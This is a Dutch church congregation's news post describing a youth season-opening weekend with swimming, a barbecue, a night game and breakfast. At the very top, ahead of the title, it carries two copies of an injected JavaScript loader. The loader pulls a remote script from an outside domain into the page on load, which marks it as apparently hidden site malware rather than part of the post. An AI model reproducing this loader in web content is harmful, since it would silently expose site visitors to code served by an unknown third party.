;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Spetterend start van het nieuwe seizoen! (+ aftermovie!) - PKN Damwâld

Spetterend start van het nieuwe seizoen! (+ aftermovie!)

Gepubliceerd op: maandag 16 september 2019

Het nieuwe kerkelijke seizoen is begonnen! Op zaterdag 14 september was de officiële start voor de jongeren met een spectaculair activiteit!

We zijn begonnen met een heerlijke zwemactiviteit voor de basisschoolkinderen in het zwembad in Leeuwarden! Alle kinderen waren heel enthousiast en hebben heerlijk genoten van het mooie zwembad met de grote glijbanen en zelfs in de hoge golven. Om 17:00 waren ze weer terug en sloot de oudere jeugd aan voor een heerlijke BBQ!

In de avond ging de jongere jeugd weer naar huis en stond een spannend activiteit voor de rest te wachten! Na uitleg en het aantrekken van veiligheidshesjes werden de jongeren meegenomen de nacht in! In het donker was een route uitgezet met reflectors die gevolgd moesten worden. Dat klinkt heel simpel, maar onderweg waren zogenaamde “hunters” actief die iedereen opeens uit het niets kwamen. Wanneer de groep gepakt werd moesten ze handelswaar inleveren die ze moesten mee smokkelen! Om het nog spannender te maken werden de jongeren halverwege ontvoerd en meegenomen met een auto naar een hele andere locatie. Vanuit hier moesten ze al puzzelend weer teruglopen naar de eindlocatie, waar iedereen ook lekker bleef slapen, nou ja, slapen…. Het was tot diep in de nacht heel gezellig 🙂

In de ochtend stond een heerlijk ontbijt klaar en gingen we met iedereen gezellig na de startdienst. Het was een spetterende nacht, een goed begin van een prachtig nieuw seizoen!

 

Aftermovie

Bekijk hier de aftermovie van het startactiviteit!